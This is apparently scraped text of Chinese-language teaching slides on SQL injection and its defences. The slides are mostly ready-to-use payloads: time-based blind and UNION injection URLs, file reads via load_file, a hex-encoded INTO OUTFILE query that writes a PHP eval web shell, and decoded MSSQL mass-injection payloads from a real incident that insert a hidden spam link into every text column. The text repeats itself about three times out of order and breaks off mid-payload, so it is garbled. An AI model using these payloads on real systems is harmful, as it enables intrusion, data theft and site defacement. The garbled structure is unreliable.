ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
